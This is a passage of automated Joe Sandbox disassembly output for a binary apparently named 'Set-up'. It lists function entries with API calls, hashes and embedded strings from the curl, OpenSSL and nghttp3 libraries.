Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: 2a9cbf51efb93dc89abc3e13dd94ad3889b934bd56ad630e6463e9d991a84a7f
Instruction ID: ad0c863642dfbaef6c270f0a52b00e265ccafdb9adfcd8a19d745bbdccf55327
Opcode Fuzzy Hash: 2a9cbf51efb93dc89abc3e13dd94ad3889b934bd56ad630e6463e9d991a84a7f
Instruction Fuzzy Hash: 37012DA6B003113BE12175656C87F3F2A4DDBD1B65F14043BFE14E62C2EB50DC0952B2

Function 002345C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00205B6B,00000017,?,?), ref: 00234612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00234660

Strings

0123456789abcdef, xrefs: 0023465B, 0023466C
0123456789ABCDEF, xrefs: 00234683, 00234694

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: 25b16983e6058f7bc2e999c387e2bf6e5dcce4871ba41b7d8f0f9c4a809c9a8a
Instruction ID: c5bafee36c6e6756c8ca8e9278dc97d9d3fc527145cc5e7c431bac987ea6c8f1
Opcode Fuzzy Hash: 25b16983e6058f7bc2e999c387e2bf6e5dcce4871ba41b7d8f0f9c4a809c9a8a
Instruction Fuzzy Hash: 75913BB1A283428BD714EE18C84027EF7E1FFD6314F198A6ED8D587381D775AD648B42

Function 00222250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0022225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002222CF

Strings

Hostname in DNS cache was stale, zapped, xrefs: 00222322
Hostname in DNS cache does not have needed family, zapped, xrefs: 002223EF, 002223FE
:%u, xrefs: 00222290, 00222363

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: acd449250f8d937d7ff1c7022847cb8fe8d60280c55a8422e19e7f4f466676a8
Instruction ID: 03e2ceb64bc529553cfe7670336d05f90aced42e4486a0307a763c4a6a99aaff
Opcode Fuzzy Hash: acd449250f8d937d7ff1c7022847cb8fe8d60280c55a8422e19e7f4f466676a8
Instruction Fuzzy Hash: 39416A71610315BBD724EE64EC81B7BB3D5EF90304F04453CEE8987382E63AAC69CA91

Function 002806F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,00280307,?), ref: 002807AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002807C3

Strings

ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 002807BE
nghttp3_qpack.c, xrefs: 002807A4, 002807B9
ctx->next_absidx > absidx, xrefs: 002807A9

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: 3d8bac915b1b2699f0a7c99b4c673f8dbdc3b248c324d7add61b44722f9b3bd6
Instruction ID: 4fdedd6b783fd4c58cded55770ad59ded47e2daaa7baaeededafd2a0845192c4
Opcode Fuzzy Hash: 3d8bac915b1b2699f0a7c99b4c673f8dbdc3b248c324d7add61b44722f9b3bd6
Instruction Fuzzy Hash: 8631E7797117009FE350AA28DCC1E2B7395FF89714F058538F94987782EB34B8698BD1

Function 00554610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(001E5FB6,?), ref: 00554645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00554698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008F6038), ref: 00554744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00554762

Strings

../list/public_suffix_list.dat, xrefs: 00554693, 005546B9, 005546F5

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: 7701d89201c1cad71c35e6830dcdb3e1a885062fd75b4d7e83a71f0e5693a105
Instruction ID: 7083e85d488a720769f4713f4138aa0bf84d7ea81cc1543c898d1a26fb25d26e
Opcode Fuzzy Hash: 7701d89201c1cad71c35e6830dcdb3e1a885062fd75b4d7e83a71f0e5693a105
Instruction Fuzzy Hash: 7A419BB19083419BC700CF68D45071ABBE5FBC534AF15482EE989D7240E771EC8D8F92

Function 00242680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00242771

Strings

gfff, xrefs: 002426EE
netascii, xrefs: 00242680
Connection time-out, xrefs: 002426CD
set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00242761

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: a9dd02027ef52232c31ac1bcc07e26f84431f595b709c7618df36b97453cc003
Instruction ID: 0539870b25da6f576d6393993ee1f32e5afa609efcaacdb9143a0dff70cc8647
Opcode Fuzzy Hash: a9dd02027ef52232c31ac1bcc07e26f84431f595b709c7618df36b97453cc003
Instruction Fuzzy Hash: 28217CB17103005FEB28AA2AAC06F3779DAEBC0300F18893DF90AC73D2F575D8158611

Function 00276010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 00276119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 0027612E

Strings

veccnt > 0, xrefs: 00276114
nghttp3_stream.c, xrefs: 0027610F, 00276124
0 == offset, xrefs: 00276129

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: b61ebb0bdb70a0792f0cc5af536d42df1e00a392ce234c78111ebb86f6a66f13
Instruction ID: 402c6ea96391e9f89a3c440cf88e5f38c17ea03c47c51a4559c21b88a8dcfb6d
Opcode Fuzzy Hash: b61ebb0bdb70a0792f0cc5af536d42df1e00a392ce234c78111ebb86f6a66f13
Instruction Fuzzy Hash: FA3136319143018FC704EF14D889A6AB7E4FF88308F05867CE88D57351E672AD65CB92

Function 001D4810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

application/octet-stream, xrefs: 001D4DE3
formdata.c, xrefs: 001D481F, 001D4C8D, 001D4DEB, 001D4F36, 001D4FF3, 001D5081, 001D50AB, 001D50E6, 001D5116, 001D5161, 001D518B, 001D51C6, 001D51F6

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: application/octet-stream$formdata.c
API String ID: 0-1216067158
Opcode ID: f3058311c64cddf05799d1ec5b43d7a1b1dcd5bc4a916e8db10e130c72827a0b
Instruction ID: aa3f5f2c287c184de1c2ecf1f1a065244495c629d214ff5c2fbfac7163d9de11
Opcode Fuzzy Hash: f3058311c64cddf05799d1ec5b43d7a1b1dcd5bc4a916e8db10e130c72827a0b
Instruction Fuzzy Hash: F602B7B0A04B409FE735DF14D941727BBE2BF54308F19492EE88A4B792E775E885CB81

Function 004746B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 004746DD

Strings

minsize=%ld, xrefs: 0047485A
ASN1_mbstring_ncopy, xrefs: 00474797, 004747BC, 004747E1, 00474806, 00474845, 00474884, 0047492C, 004749DE, 00474A35
crypto/asn1/a_mbstr.c, xrefs: 0047479E, 004747C3, 004747E8, 0047480D, 0047484C, 0047488B, 00474933, 00474A3F, 00474A9D
maxsize=%ld, xrefs: 00474899

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: b6877c23380729bd77128d57d26b63a446109c7dce010b2b8977b41bb80b901f
Instruction ID: 42b6b4afc6f0d8462efb1267e1fdf0f095c0d3fb9e936553b716b056bac87e42
Opcode Fuzzy Hash: b6877c23380729bd77128d57d26b63a446109c7dce010b2b8977b41bb80b901f
Instruction Fuzzy Hash: 91A12A75B49301ABE3106A249D02B7B7390EBC5B04F14C42AFA5DAB3C6E77CD811869F

Function 003C2530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

crypto/objects/obj_dat.c, xrefs: 003C2810
.%lu, xrefs: 003C2761

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: 896f088295bd9856a86a95e449ec96a98f0677dcae131908f85c4702fb56e6e4
Instruction ID: 5dd163bb948e0ab8533ce42676ea7929ff3cc3e2179893745fec11006771f828
Opcode Fuzzy Hash: 896f088295bd9856a86a95e449ec96a98f0677dcae131908f85c4702fb56e6e4
Instruction Fuzzy Hash: 92A127B2A083019BD7129E258951F2BB7E9AFD1704F15882DFC98CB351EB71DC05D7A2

Function 00200080 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 301stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00200090

Part of subcall function 002BF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,002000B0,?,?,00000000,00000000,?), ref: 002BF35D

Strings

Offset (%lld) was beyond file size (%lld), xrefs: 00204CF5, 00204D0E, 00204D64
$, xrefs: 00204D75
File already completely downloaded, xrefs: 00204239
Bad file size (%lld), xrefs: 00204CFF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
API String ID: 3014104814-979756411
Opcode ID: 303ec8931485a560ec505a8891eafe6a338047b4926a043fd86bc50c8b377a63
Instruction ID: 97ec3550a198a2387c479af848c42d0b653b41ec5fccf87843f443aca3e2b7e0
Opcode Fuzzy Hash: 303ec8931485a560ec505a8891eafe6a338047b4926a043fd86bc50c8b377a63
Instruction Fuzzy Hash: 37B127B1B243419FD314DF28C880A6AB7E5AFD8314F14862DFA54973E3D770AD148B52

Function 001EE300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

transfer.c, xrefs: 001EE331, 001EE364, 001EE479, 001EE59A, 001EE5E4, 001EE70D, 001EE729
No URL set, xrefs: 001EE393
User-Agent: %s, xrefs: 001EE60C
cannot mix POSTFIELDS with RESUME_FROM, xrefs: 001EE3C1

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: 1c274e61da16b4dbef8e42106336e34c844fdcef75a05460e2e8696f27142f93
Instruction ID: 60d9b7769765ddd7e7b5fb6ab3fc9037d8b773e5a885db5a199bfdb10c8135ad
Opcode Fuzzy Hash: 1c274e61da16b4dbef8e42106336e34c844fdcef75a05460e2e8696f27142f93
Instruction Fuzzy Hash: A1B106B5B00E42ABE7289B75DC45BAAF7A0BF65315F040329E51C92282F7357474CBD2

Function 0032A210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0032A37F

Strings

ssl/quic/quic_channel.c, xrefs: 0032A2E3, 0032A3BA
ossl_quic_channel_raise_protocol_error_loc, xrefs: 0032A2D9, 0032A3B0
QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0032A310
QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0032A3D5

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
